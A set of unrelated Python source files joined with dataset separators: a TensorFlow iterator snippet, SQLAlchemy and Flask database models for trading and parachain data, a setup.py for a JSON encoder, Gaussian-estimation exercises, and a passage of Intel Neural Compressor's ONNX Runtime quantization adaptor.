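    it = tf.data.Iterator.from_structure(ds_train.output_types, ds_train.output_shapes)
    init_ops = [it.make_initializer(ds_train), it.make_initializer(ds_val)]
    batch = it.get_next()

    with tf.Session() as sess:
        for init_op in init_ops:
            sess.run(init_op)
            try:
                while True:
                    print(sess.run(batch))
            except tf.errors.OutOfRangeError:
                pass  # split exhausted; switch to the next one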
nilq/baby-python
python
import os

from dynaconf import settings
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker

from database.models.transaction import Transaction
from database.models.trade import Trade
from database.models.types import Types
from database.models.status import Status


class Database(object):
    def __init__(self):
        # DATABASE_URL is a template like "postgresql://{}:{}@host/{}"; note
        # that POSTGRES_USER is reused as the database name here.
        self.engine = create_engine(settings.DATABASE_URL.format(os.environ['POSTGRES_USER'],
                                                                 os.environ['POSTGRES_PASSWORD'],
                                                                 os.environ['POSTGRES_USER']))
        self.session = sessionmaker()
        self.session.configure(bind=self.engine)

    def create_transaction(self):
        return self.upsert_transaction(Transaction())

    def upsert_transaction(self, transaction):
        return self._upsert_data(transaction)

    def count_transactions(self):
        session = self.session()
        try:
            count = session.query(Transaction).count()
        finally:
            session.close()

        return count

    def fetch_pending_sells(self):
        # Sell trades that are still marked as ongoing
        session = self.session()
        try:
            trades = session.query(Trade).filter(Trade.type == Types.SELL,
                                                 Trade.status == Status.ONGOING).all()
        finally:
            session.close()

        return trades

    def upsert_trade(self, trade):
        return self._upsert_data(trade)

    def upsert_balance(self, balance):
        return self._upsert_data(balance)

    def _upsert_data(self, data):
        # Add-and-commit helper shared by the public upsert methods; rolls back
        # on any error and always closes the session.
        session = self.session()
        try:
            session.add(data)
            session.commit()
            session.refresh(data)
        except Exception:
            session.rollback()
            raise
        finally:
            session.close()

        return data
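# --- Usage sketch (not part of the original module) ---
# A minimal, hedged example of the Database helper above. It assumes a
# reachable Postgres instance, the POSTGRES_USER/POSTGRES_PASSWORD environment
# variables, and a dynaconf DATABASE_URL template along the lines of
# "postgresql://{}:{}@localhost:5432/{}" -- all placeholders, not values from
# the original code.
if __name__ == "__main__":
    db = Database()
    db.create_transaction()  # persist a new (empty) transaction row
    print("transactions stored:", db.count_transactions())
    for trade in db.fetch_pending_sells():  # sell trades still marked ONGOING
        print(trade)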
nilq/baby-python
python
##
# Copyright (c) 2012 Sprymix Inc.
# All rights reserved.
#
# See LICENSE for details.
##


import sys

from setuptools import setup, Extension


if sys.version_info[:2] < (3, 3):
    raise RuntimeError('metamagic.json requires python 3.3 or greater')

with open('README.rst') as f:
    readme = f.read()


setup(
    name='metamagic.json',
    version='0.9.6',
    description='Fast JSON encoder',
    long_description=readme,
    maintainer='MagicStack Inc.',
    maintainer_email='hello@magic.io',
    license='BSD',
    url='http://github.com/sprymix/metamagic.json',
    platforms=['any'],
    keywords='json',
    ext_modules=[
        Extension('metamagic.json._encoder',
                  sources=['metamagic/json/_encoder/_encoder.c'],
                  extra_compile_args=['-O3'])
    ],
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: BSD License',
        'Operating System :: OS Independent',
        'Programming Language :: C',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4'
    ],
    packages=[
        'metamagic.json', 'metamagic.json._encoder', 'metamagic.json.tests'
    ],
    include_package_data=True
)
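# --- Usage sketch (not part of the original setup.py) ---
# After installation (e.g. `pip install metamagic.json`), the encoder is used
# much like the stdlib json module; the dumps() entry point and the exact
# output formatting below are assumptions based on the package description,
# so check the package README for the authoritative API:
#
#   >>> from metamagic.json import dumps
#   >>> dumps({'key': [1, 2, 3]})
#   '{"key":[1,2,3]}'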
nilq/baby-python
python
from flask_sqlalchemy import SQLAlchemy

from api.db.data_request import DataRequest

db = SQLAlchemy()


class ParachainData(db.Model):
    __tablename__ = 'parachain_data'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    para_id = db.Column(db.String)
    account_id = db.Column(db.String)
    requested_block_number = db.Column(db.BigInteger)
    processed_block_number = db.Column(db.BigInteger)
    requested_timestamp = db.Column(db.DateTime)
    processed_timestamp = db.Column(db.DateTime)
    payload = db.Column(db.String)
    feed_name = db.Column(db.String)
    url = db.Column(db.String)

    @classmethod
    def select_all_by_feed(cls, feed):
        result = db.session.query(ParachainData) \
            .filter_by(feed_name=feed) \
            .order_by(ParachainData.processed_timestamp) \
            .all()

        return [ParachainData.row_to_dict(row) for row in result]

    @classmethod
    def row_to_dict(cls, row):
        payload = {}
        for column in row.__table__.columns:
            payload[column.name] = str(getattr(row, column.name))

        return payload

    @classmethod
    def insert_new_row(cls, data_request: DataRequest):
        insert = ParachainData(
            para_id=data_request.para_id,
            account_id=data_request.account_id,
            requested_block_number=data_request.requested_block_number,
            processed_block_number=data_request.processed_block_number,
            requested_timestamp=data_request.requested_timestamp,
            processed_timestamp=data_request.processed_timestamp,
            payload=data_request.payload,
            feed_name=data_request.feed_name,
            url=data_request.url,
        )

        db.session.add(insert)
        db.session.commit()


class Users(db.Model):
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    wallet = db.Column(db.String(100), unique=True)
    api_key = db.Column(db.String(100))
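# --- Usage sketch (not part of the original module) ---
# A hedged example of wiring the models above into a Flask app; the app
# factory, the in-memory SQLite URI and the feed name are illustrative
# assumptions, not values from the original code.
if __name__ == "__main__":
    from flask import Flask

    app = Flask(__name__)
    app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///:memory:"  # placeholder URI
    db.init_app(app)
    with app.app_context():
        db.create_all()
        # insert_new_row expects a populated DataRequest instance; once rows
        # exist, select_all_by_feed returns one dict per row, ordered by
        # processed_timestamp:
        print(ParachainData.select_all_by_feed("price-feed"))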
nilq/baby-python
python
from IMLearn.learners import UnivariateGaussian, MultivariateGaussian
import numpy as np
# import plotly.graph_objects as go
# import plotly.io as pio
from matplotlib import pyplot as plt

# pio.templates.default = "simple_white"


def test_univariate_gaussian():
    # Question 1 - Draw samples and print fitted model
    mu = 10
    sigma = 1
    univariategaussian = UnivariateGaussian().fit(np.random.normal(loc=mu, scale=sigma, size=1000))
    print("({},{})".format(univariategaussian.mu_, univariategaussian.var_))

    # Question 2 - Empirically showing sample mean is consistent
    mu = 10
    sigma = 1
    x = np.arange(10, 1000, 10)
    mu_array = []
    for i in x:
        univariategaussian = UnivariateGaussian().fit(np.random.normal(loc=mu, scale=sigma, size=i))
        mu_array.append(np.abs(univariategaussian.mu_ - mu))
    plt.plot(x, mu_array)
    plt.legend(["mu"])
    plt.xlabel("Sample Size")
    plt.ylabel("Absolute distance from real value")
    plt.title("Estimation error for different sample sizes")
    plt.show()

    # Question 3 - Plotting Empirical PDF of fitted model
    univariategaussian = UnivariateGaussian().fit(np.random.normal(loc=mu, scale=sigma, size=1000))
    t = np.linspace(6, 14, 1000)
    y = univariategaussian.pdf(t)
    plt.scatter(t, y)
    plt.legend(["PDF"])
    plt.xlabel("Sample value")
    plt.ylabel("Density of probability")
    plt.title("PDF function for mu=10, sigma=1")  # TODO: answer the Q3
    plt.show()


def test_multivariate_gaussian():
    # Question 4 - Draw samples and print fitted model
    mu = np.array([0, 0, 4, 0]).T
    cov = np.array([[1, 0.2, 0, 0.5],
                    [0.2, 2, 0, 0],
                    [0, 0, 1, 0],
                    [0.5, 0, 0, 1]])
    samples = np.random.multivariate_normal(mu, cov, 1000)
    mvg = MultivariateGaussian().fit(samples)
    print()
    print("expectations:")
    print(mvg.mu_)
    print("cov matrix:")
    print(mvg.cov_)

    # Question 5 - Likelihood evaluation
    f3 = f1 = np.linspace(-10, 10, 200)
    y = np.zeros(shape=(200, 200))
    max_ll = -np.inf   # running maximum of the log-likelihood
    max_idx = (0, 0)   # indices of the maximizing (f1, f3) pair
    samples = np.random.multivariate_normal(mu, cov, 1000)
    for i in range(200):
        for j in range(200):
            mu = np.array([f1[i], 0, f3[j], 0]).T
            y[i][j] = MultivariateGaussian.log_likelihood(mu, cov, samples)
            if y[i][j] > max_ll:
                max_ll = y[i][j]
                max_idx = (i, j)
    plt.imshow(y, extent=[-10, 10, -10, 10])
    plt.title("log-likelihood as a function of f1 and f3")
    plt.colorbar()
    plt.xlabel("feature 3")
    plt.ylabel("feature 1")
    plt.show()

    # Question 6 - Maximum likelihood
    print("argmax indices:", max_idx)
    print("f1={:.3f}, f3={:.3f}".format(f1[max_idx[0]], f3[max_idx[1]]))


if __name__ == '__main__':
    np.random.seed(0)
    test_univariate_gaussian()
    test_multivariate_gaussian()
nilq/baby-python
python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2021 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
import copy
import logging
from collections import OrderedDict
from collections.abc import KeysView
import yaml
import numpy as np
from distutils.version import StrictVersion
from neural_compressor.adaptor.adaptor import adaptor_registry, Adaptor
from neural_compressor.adaptor.query import QueryBackendCapability
from neural_compressor.utils.utility import LazyImport, dump_elapsed_time, \
    GLOBAL_STATE, MODE
from ..utils.utility import OpPrecisionStatistics
from ..experimental.data.dataloaders.base_dataloader import BaseDataLoader
import math

onnx = LazyImport("onnx")
ort = LazyImport("onnxruntime")

ONNXRT152_VERSION = StrictVersion("1.5.2")

logger = logging.getLogger()


class ONNXRTAdaptor(Adaptor):
    """The ONNXRT adaptor layer, do onnx-rt quantization, calibration,
       inspect layer tensors.

    Args:
        framework_specific_info (dict): framework specific configuration for quantization.
    """

    def __init__(self, framework_specific_info):
        super().__init__(framework_specific_info)
        self.__config_dict = {}
        self.quantizable_ops = []
        self.static = framework_specific_info["approach"] == "post_training_static_quant"
        self.backend = framework_specific_info["backend"]
        self.work_space = framework_specific_info["workspace_path"]
        self.graph_optimization = framework_specific_info["graph_optimization"]
        self.benchmark = (GLOBAL_STATE.STATE == MODE.BENCHMARK)
        os.makedirs(self.work_space, exist_ok=True)
        self.pre_optimized_model = None
        self.quantizable_op_types = self._query_quantizable_op_types()
        self.evaluate_nums = 0

        self.fp32_results = []
        self.fp32_preds_as_label = False
        self.quantize_config = {}  # adaptor should know current configs at any time
        self.quantize_params = {}  # adaptor should know current params at any time

    @dump_elapsed_time("Pass quantize model")
    def quantize(self, tune_cfg, model, data_loader, q_func=None):
        """The function is used to do calibration and quantization in post-training
           quantization.

        Args:
            tune_cfg (dict):      quantization config.
            model (object):       model need to do quantization.
            data_loader (object): calibration dataset.
            q_func (optional):    training function for quantization aware training mode,
                                  not yet implemented for ONNX.
Returns: (dict): quantized model """ assert q_func is None, "quantization aware training has not been supported on ONNXRUNTIME" model = self.pre_optimized_model if self.pre_optimized_model else model ort_version = StrictVersion(ort.__version__) if ort_version < ONNXRT152_VERSION: # pragma: no cover logger.warning("Quantize input needs onnxruntime 1.5.2 or newer.") return model if model.model.opset_import[0].version < 11: # pragma: no cover logger.warning("Quantize input needs model opset 11 or newer.") from neural_compressor.adaptor.ox_utils.onnx_quantizer import ONNXQuantizer from onnxruntime.quantization.quant_utils import QuantizationMode backend = QuantizationMode.QLinearOps if self.backend == \ "qlinearops" else QuantizationMode.IntegerOps self.quantizable_ops = self._query_quantizable_ops(model.model) tmp_model = copy.deepcopy(model) quantize_config = self._cfg_to_quantize_config(tune_cfg) iterations = tune_cfg.get('calib_iteration', 1) calib_sampling_size = tune_cfg.get('calib_sampling_size', 1) if self.static: if isinstance(data_loader, BaseDataLoader): batch_size = data_loader.batch_size try: for i in range(batch_size): if calib_sampling_size % (batch_size - i) == 0: calib_batch_size = batch_size - i if i != 0: # pragma: no cover logger.warning("Reset `calibration.dataloader.batch_size` field " "to {}".format(calib_batch_size) + " to make sure the sampling_size is " "divisible exactly by batch size") break tmp_iterations = int(math.ceil(calib_sampling_size / calib_batch_size)) data_loader.batch(calib_batch_size) quantize_params = self._get_quantize_params(tmp_model.model, data_loader, \ quantize_config, tmp_iterations) except Exception: # pragma: no cover logger.warning( "Fail to forward with batch size={}, set to {} now.". format(batch_size, 1)) data_loader.batch(1) quantize_params = self._get_quantize_params(tmp_model.model, data_loader, \ quantize_config, calib_sampling_size) else: # pragma: no cover if hasattr(data_loader, 'batch_size') and \ calib_sampling_size % data_loader.batch_size != 0: logger.warning( "Please note that calibration sampling size {} " \ "isn't divisible exactly by batch size {}. " \ "So the real sampling size is {}.". 
format(calib_sampling_size, data_loader.batch_size, data_loader.batch_size * iterations)) quantize_params = self._get_quantize_params(tmp_model.model, data_loader, \ quantize_config, iterations) else: quantize_params = None self.quantize_params = quantize_params quantizer = ONNXQuantizer(tmp_model.model, quantize_config, backend, self.static, quantize_params, self.quantizable_op_types) quantizer.quantize_model() tmp_model.q_config = self._generate_qconfig(model.model, tune_cfg, quantize_params) tmp_model.model = quantizer.model.model self.quantize_config = quantize_config # update so other methods can know current configs self._dump_model_op_stastics(tmp_model) return tmp_model def _generate_qconfig(self, model, tune_cfg, quantize_params): tune_cfg = copy.deepcopy(tune_cfg) for node in model.graph.node: if (node.name, node.op_type) not in tune_cfg['op']: continue scale_info = {} if quantize_params: for input_name in node.input: if input_name in quantize_params: scale_info[input_name] = quantize_params[input_name] for output_name in node.output: if output_name in quantize_params: scale_info[output_name] = quantize_params[output_name] tune_cfg['op'][(node.name, node.op_type)]['scale_info'] = scale_info fwk_info = {} fwk_info['approach'] = self.static fwk_info['backend'] = self.backend fwk_info['workspace_path'] = self.work_space fwk_info['graph_optimization'] = self.graph_optimization tune_cfg['framework_specific_info'] = fwk_info return tune_cfg @dump_elapsed_time("Pass recover model") def recover(self, model, q_config): """Execute the recover process on the specified model. Args: model (object): model need to do quantization. q_config (dict): recover configuration Returns: (dict): quantized model """ self._pre_optimize(model) model = self.pre_optimized_model ort_version = StrictVersion(ort.__version__) if ort_version < ONNXRT152_VERSION: # pragma: no cover logger.warning("Quantize input needs onnxruntime 1.5.2 or newer.") return model if model.model.opset_import[0].version < 11: # pragma: no cover logger.warning("Quantize input needs model opset 11 or newer.") from neural_compressor.adaptor.ox_utils.onnx_quantizer import ONNXQuantizer from onnxruntime.quantization.quant_utils import QuantizationMode backend = QuantizationMode.QLinearOps if self.backend == \ "qlinearops" else QuantizationMode.IntegerOps self.quantizable_ops = self._query_quantizable_ops(model.model) quantize_params, tune_cfg = self._parse_qconfig(q_config) quantize_config = self._cfg_to_quantize_config(tune_cfg) quantizer = ONNXQuantizer(model.model, quantize_config, backend, self.static, quantize_params, self.quantizable_op_types) quantizer.quantize_model() model.model = quantizer.model.model return model def _parse_qconfig(self, q_config): quantize_params = {} tune_cfg = {} for k, v in q_config.items(): if k == 'op': tune_cfg['op'] = {} for op_name_type, op_info in v.items(): node_dict = {} for info_name, info_content in op_info.items(): if info_name != 'scale_info': node_dict[info_name] = info_content else: for tensor_name, param in info_content.items(): quantize_params[tensor_name] = param tune_cfg['op'][op_name_type] = node_dict else: tune_cfg[k] = v if len(quantize_params) == 0: quantize_params = None return quantize_params, tune_cfg def _dump_model_op_stastics(self, model): fp32_op_list = self.query_handler.get_op_types_by_precision( # pylint: disable=no-member precision='int8') if self.backend == "qlinearops": int8_op_list = ["QLinearConv", "QLinearMatMul", "QAttention", "QLinearMul", "QLinearRelu", "QLinearClip", 
"QLinearLeakyRelu", "QLinearSigmoid", "MaxPool","Squeeze", "EmbedLayerNormalization", "QLinearGlobalAveragePool", "QLinearAdd", "Pad", "Split", "Gather", "Reshape", "Concat", "QuantizeLinear", "DequantizeLinear", "QLinearAveragePool", "Unsqueeze", "Transpose" ] else: int8_op_list = ["ConvInteger", "MatMulInteger", "QAttention", "DynamicQuantizeLSTM", "Gather", "EmbedLayerNormalization", "DynamicQuantizeLinear" ] res = {} for op_type in fp32_op_list: res[op_type] = {'INT8':0, 'BF16': 0, 'FP32':0} for op_type in ["QuantizeLinear", "DequantizeLinear", "DynamicQuantizeLinear"]: res[op_type] = {'INT8':0, 'BF16': 0, 'FP32':0} for node in model.model.graph.node: possible_int8_res = [name for name in int8_op_list if node.op_type.find(name) != -1] if any(possible_int8_res): if self.backend == "qlinearops": if node.op_type == "QuantizeLinear" or node.op_type == "DequantizeLinear" \ or node.op_type == "DynamicQuantizeLinear": origin_op_type = node.op_type else: origin_op_type = possible_int8_res[0].split('QLinear')[-1] else: origin_op_type = possible_int8_res[0].split('Integer')[0] if node.op_type in ["Pad", "Split", "Gather", "Concat", "Reshape", "Unsqueeze", "Squeeze", "Transpose"]: if any([output.endswith('_quantized') for output in node.output]): origin_op_type = node.op_type else: if node.op_type in res: res[node.op_type]['FP32'] += 1 continue if origin_op_type == "QAttention": origin_op_type = "Attention" res[origin_op_type]['INT8'] += 1 elif node.op_type in fp32_op_list: res[node.op_type]['FP32'] += 1 output_data = [[op_type, sum(res[op_type].values()), res[op_type]['INT8'], res[op_type]['BF16'], res[op_type]['FP32']] for op_type in res.keys()] OpPrecisionStatistics(output_data).print_stat() def _get_quantize_params(self, model, data_loader, quantize_config, iterations): from neural_compressor.adaptor.ox_utils.onnxrt_mid import ONNXRTAugment from neural_compressor.model.onnx_model import ONNXModel if not isinstance(model, ONNXModel): model = ONNXModel(model) black_nodes = [node for node in quantize_config if quantize_config[node]=='fp32'] white_nodes = [node for node in quantize_config if quantize_config[node]!='fp32'] augment = ONNXRTAugment(model, \ data_loader, self.quantizable_op_types, \ os.path.join(self.work_space, 'augmented_model.onnx'), \ black_nodes=black_nodes, white_nodes=white_nodes, \ iterations=list(range(0, quantize_config['calib_iteration']))) quantize_params = augment.dump_calibration() return quantize_params def inspect_tensor(self, model, data_loader, op_list=[], iteration_list=[], inspect_type='activation', save_to_disk=False): '''The function is used by tune strategy class for dumping tensor info. 
''' from neural_compressor.adaptor.ox_utils.onnxrt_mid import ONNXRTAugment from neural_compressor.model.onnx_model import ONNXModel if not isinstance(model, ONNXModel): model = ONNXModel(model) if len(op_list) > 0 and isinstance(op_list, KeysView): op_list = [item[0] for item in op_list] augment = ONNXRTAugment(model, data_loader, [], \ os.path.join(self.work_space, 'augment_for_inspect.onnx'), \ iterations=iteration_list, white_nodes=op_list) tensors = augment.dump_tensor(activation=(inspect_type!='weight'), weight=(inspect_type!='activation')) if save_to_disk: np.savez(os.path.join(self.work_space, 'dumped_tensors.npz'), tensors) return tensors def set_tensor(self, model, tensor_dict): from onnx import numpy_helper from neural_compressor.model.onnx_model import ONNXModel from neural_compressor.adaptor.ox_utils.util import quantize_data_with_scale_zero from neural_compressor.adaptor.ox_utils.util import quantize_data_per_channel if not isinstance(model, ONNXModel): model = ONNXModel(model) assert "QuantizeLinear" in [node.op_type for node in model.model.graph.node], \ 'adaptor.set_tensor only accept int8 model' input_name_to_nodes = model.input_name_to_nodes for tensor_name, tensor_value in tensor_dict.items(): if not tensor_name.endswith('_quantized'): tensor_name += '_quantized' not_filter = False scale_tensor, zo_tensor = model.get_scale_zero(tensor_name) if scale_tensor is None or zo_tensor is None: not_filter = True else: scale_value = numpy_helper.to_array(scale_tensor) zo_value = numpy_helper.to_array(zo_tensor) assert len(input_name_to_nodes[tensor_name]) == 1, \ 'quantized filter weight should be input of only one node' node = input_name_to_nodes[tensor_name][0] #TBD only for conv bias node_name = node.name.replace('_quant', '') assert node_name in self.quantize_config q_type = self.quantize_config[node_name]['weight']['dtype'] if not_filter: new_tensor_value = self._requantize_bias(model, tensor_name, tensor_value) elif self.quantize_config[node_name]['weight']['granularity'] == 'per_tensor': new_tensor_value = quantize_data_with_scale_zero( tensor_value, q_type, self.quantize_config[node_name]['weight']['scheme'], scale_value, zo_value) else: new_tensor_value = quantize_data_per_channel( tensor_value, q_type, self.quantize_config[node_name]['weight']['scheme'], scale_value, zo_value) model.set_initializer(tensor_name, new_tensor_value) return model def _requantize_bias(self, model, bias_name, bias_data): ''' helper function to requantize bias, borrowed from onnx_quantizer ''' from onnx import numpy_helper node = model.input_name_to_nodes[bias_name][0] input_scale_name = node.input[1] input_scale = numpy_helper.to_array(model.get_initializer(input_scale_name)) weight_scale_name = node.input[4] weight_scale = numpy_helper.to_array(model.get_initializer(weight_scale_name)) bias_scale = input_scale * weight_scale new_bias_data = (bias_data / bias_scale).round().astype(np.int32) return new_bias_data def _pre_optimize(self, model, level=1): from neural_compressor.adaptor.ox_utils.util import split_shared_input model = split_shared_input(model) sess_options = ort.SessionOptions() level = self.query_handler.get_graph_optimization() # pylint: disable=no-member if self.graph_optimization.level: optimization_levels = { 'DISABLE_ALL': ort.GraphOptimizationLevel.ORT_DISABLE_ALL, 'ENABLE_BASIC': ort.GraphOptimizationLevel.ORT_ENABLE_BASIC, 'ENABLE_EXTENDED': ort.GraphOptimizationLevel.ORT_ENABLE_EXTENDED, 'ENABLE_ALL': ort.GraphOptimizationLevel.ORT_ENABLE_ALL} assert 
self.graph_optimization.level in optimization_levels, "the optimization \ choices are {}".format(optimization_levels.keys()) level = optimization_levels[self.graph_optimization.level] sess_options.graph_optimization_level = level sess_options.optimized_model_filepath = os.path.join(self.work_space, \ "Optimized_model.onnx") _ = ort.InferenceSession(model.model.SerializeToString(), sess_options) tmp_model = onnx.load(sess_options.optimized_model_filepath) model.model = self._replace_gemm_with_matmul(tmp_model).model \ if self.graph_optimization.gemm2matmul else tmp_model model.model = self._rename_node(model.model) self.pre_optimized_model = model def _rename_node(self, model): node_names = [i.name for i in model.graph.node] if len(set(node_names)) < len(node_names): logger.warning("This model has nodes with the same name, please check \ renamed_model.onnx in workspace_path (default is nc_workspace) \ for newly generated node name") for idx, node in enumerate(model.graph.node): if node_names.count(node.name) > 1: node.name = node.op_type + '_nc_rename_' + str(idx) onnx.save(model, os.path.join(self.work_space, "renamed_model.onnx")) return model def _replace_gemm_with_matmul(self, model): new_nodes = [] from onnx import numpy_helper from neural_compressor.model.onnx_model import ONNXModel if not isinstance(model, ONNXModel): model = ONNXModel(model) for node in model.nodes(): if node.op_type == 'Gemm': alpha = 1.0 beta = 1.0 transA = 0 transB = 0 for attr in node.attribute: if attr.name == 'alpha': alpha = onnx.helper.get_attribute_value(attr) elif attr.name == 'beta': beta = onnx.helper.get_attribute_value(attr) elif attr.name == 'transA': transA = onnx.helper.get_attribute_value(attr) elif attr.name == 'transB': transB = onnx.helper.get_attribute_value(attr) if alpha == 1.0 and beta == 1.0 and transA == 0: inputB = node.input[1] if transB == 1: B = model.get_initializer(node.input[1]) if B: # assume B is not used by any other node B_array = numpy_helper.to_array(B) B_trans = numpy_helper.from_array(B_array.T) B_trans.name = B.name model.remove_initializer(B) model.add_initializer(B_trans) #TBD this is for onnx model zoo, which are all in old IR version if model.model.ir_version < 4: for input in model.model.graph.input: if input.name == B_trans.name: for i, dim in enumerate(input.type.tensor_type.shape.dim): dim.dim_value = B_array.T.shape[i] else: inputB += '_Transposed' transpose_node = onnx.helper.make_node('Transpose', inputs=[node.input[1]], outputs=[inputB], name=node.name+'_Transpose') new_nodes.append(transpose_node) matmul_node = onnx.helper.make_node('MatMul', inputs=[node.input[0], inputB], outputs=[node.output[0] + ('_MatMul' if len(node.input)>2 else '')], name=node.name + '_MatMul') new_nodes.append(matmul_node) if len(node.input) > 2: add_node = onnx.helper.make_node('Add', inputs=[node.output[0] + '_MatMul', node.input[2]], outputs=node.output, name=node.name + '_Add') new_nodes.append(add_node) # unsupported else: new_nodes.append(node) # not GEMM else: new_nodes.append(node) model.graph().ClearField('node') model.graph().node.extend(new_nodes) return model def query_fw_capability(self, model): """The function is used to query framework capability. 
        TODO: will be replaced by framework query API

        Args:
            model: onnx model

        Returns:
            (dict): quantization capability
        """
        # optype_wise and op_wise capability
        self._pre_optimize(model)
        quantizable_ops = self._query_quantizable_ops(self.pre_optimized_model.model)
        optype_wise = OrderedDict()
        special_config_types = list(self.query_handler.get_quantization_capability()\
                                    ['int8'].keys())  # pylint: disable=no-member
        default_config = self.query_handler.get_quantization_capability()[\
                                    'int8']['default']  # pylint: disable=no-member
        op_wise = OrderedDict()
        for _, op in enumerate(quantizable_ops):
            if op.op_type not in special_config_types:
                op_capability = default_config
            else:
                op_capability = \
                    self.query_handler.get_quantization_capability()[\
                        'int8'][op.op_type]  # pylint: disable=no-member

            if op.op_type not in optype_wise.keys():
                optype_wise[op.op_type] = copy.deepcopy(op_capability)

            op_wise.update(
                {(op.name, op.op_type): copy.deepcopy(op_capability)})

        return {'optypewise': optype_wise, 'opwise': op_wise}

    def _cfg_to_quantize_config(self, tune_cfg):
        quantize_config = {}
        quantize_config['calib_iteration'] = tune_cfg['calib_iteration']
        granularity = 'per_tensor'
        algorithm = 'minmax'

        from onnx import onnx_pb as onnx_proto
        for _, op in enumerate(self.quantizable_ops):
            if tune_cfg['op'][(op.name, op.op_type)]['activation']['dtype'] == 'fp32':
                quantize_config[op.name] = 'fp32'
            else:
                node_config = copy.deepcopy(tune_cfg['op'][(op.name, op.op_type)])
                for tensor, config in tune_cfg['op'][(op.name, op.op_type)].items():
                    if 'granularity' not in config:
                        node_config[tensor]['granularity'] = granularity
                    if 'algorithm' not in config:
                        node_config[tensor]['algorithm'] = algorithm
                    if config['dtype'] == "int8":
                        node_config[tensor]['dtype'] = \
                            onnx_proto.TensorProto.INT8  # pylint: disable=no-member
                        if 'scheme' not in config:
                            node_config[tensor]['scheme'] = 'sym'
                    else:
                        node_config[tensor]['dtype'] = \
                            onnx_proto.TensorProto.UINT8  # pylint: disable=no-member
                        if 'scheme' not in config:
                            node_config[tensor]['scheme'] = 'asym'
                quantize_config[op.name] = node_config

        return quantize_config

    def _query_quantizable_ops(self, model):
        for node in model.graph.node:
            if node.op_type in self.quantizable_op_types and node not in self.quantizable_ops:
                self.quantizable_ops.append(node)

        return self.quantizable_ops

    def _query_quantizable_op_types(self):
        quantizable_op_types = self.query_handler.get_op_types_by_precision( \
            precision='int8')  # pylint: disable=no-member
        return quantizable_op_types

    def evaluate(self, input_graph, dataloader, postprocess=None,
                 metric=None, measurer=None, iteration=-1,
                 tensorboard=False, fp32_baseline=False):
        """The function is for evaluation if no eval function is given

        Args:
            input_graph      : onnx model for evaluation
            dataloader       : dataloader for evaluation. neural_compressor.data.dataloader.ONNXDataLoader
            postprocess      : post-process for evaluation. neural_compressor.data.transform.ONNXTransforms
            metric           : metrics for evaluation. neural_compressor.metric.ONNXMetrics
            measurer         : neural_compressor.objective.Measurer
            iteration(int)   : max iterations of evaluation.
            tensorboard(bool): whether to use tensorboard for visualization
            fp32_baseline (boolean, optional): only for compare_label=False pipeline

        Returns:
            (float) evaluation results. acc, f1 e.g.
""" sess_options = ort.SessionOptions() if measurer: # https://github.com/microsoft/onnxruntime/issues/7347 cores_per_instance = int(os.environ.get('CORES_PER_INSTANCE')) assert cores_per_instance > 0, "benchmark cores_per_instance should greater than 0" sess_options.intra_op_num_threads = cores_per_instance session = ort.InferenceSession(input_graph.model.SerializeToString(), sess_options) if metric: metric.reset() if hasattr(metric, "compare_label") and not metric.compare_label: self.fp32_preds_as_label = True results = [] ort_inputs = {} len_inputs = len(session.get_inputs()) inputs_names = [session.get_inputs()[i].name for i in range(len_inputs)] def eval_func(dataloader): for idx, (inputs, labels) in enumerate(dataloader): if not isinstance(labels, list): labels = [labels] if len_inputs == 1: ort_inputs.update({inputs_names[0]: inputs}) else: assert len_inputs == len(inputs), \ 'number of input tensors must align with graph inputs' for i in range(len_inputs): # in case dataloader contains non-array input if not isinstance(inputs[i], np.ndarray): ort_inputs.update({inputs_names[i]: np.array(inputs[i])}) else: ort_inputs.update({inputs_names[i]: inputs[i]}) if measurer is not None: measurer.start() predictions = session.run(None, ort_inputs) measurer.end() else: predictions = session.run(None, ort_inputs) if self.fp32_preds_as_label: self.fp32_results.append(predictions) if fp32_baseline else \ results.append(predictions) if postprocess is not None: predictions, labels = postprocess((predictions, labels)) if metric is not None and not self.fp32_preds_as_label: metric.update(predictions, labels) if idx + 1 == iteration: break if isinstance(dataloader, BaseDataLoader) and not self.benchmark: try: eval_func(dataloader) except Exception: # pragma: no cover logger.warning( "Fail to forward with batch size={}, set to {} now.". format(dataloader.batch_size, 1)) dataloader.batch(1) eval_func(dataloader) else: # pragma: no cover eval_func(dataloader) if self.fp32_preds_as_label: from neural_compressor.adaptor.ox_utils.util import collate_preds if fp32_baseline: results = collate_preds(self.fp32_results) metric.update(results, results) else: reference = collate_preds(self.fp32_results) results = collate_preds(results) metric.update(results, reference) acc = metric.result() if metric is not None else 0 return acc def save(self, model, path): """ save model Args: model (ModelProto): model to save path (str): save path """ model.save(os.path.join(path, "best_model.onnx")) @adaptor_registry class ONNXRT_QLinearOpsAdaptor(ONNXRTAdaptor): """The ONNXRT adaptor layer, do onnx-rt quantization, calibration, inspect layer tensors. Args: framework_specific_info (dict): framework specific configuration for quantization. """ def __init__(self, framework_specific_info): self.query_handler = ONNXRTQuery(local_config_file=os.path.join( os.path.dirname(__file__), "onnxrt_qlinear.yaml")) self.backend = "qlinearops" super().__init__(framework_specific_info) @adaptor_registry class ONNXRT_IntegerOpsAdaptor(ONNXRTAdaptor): """The ONNXRT adaptor layer, do onnx-rt quantization, calibration, inspect layer tensors. Args: framework_specific_info (dict): framework specific configuration for quantization. 
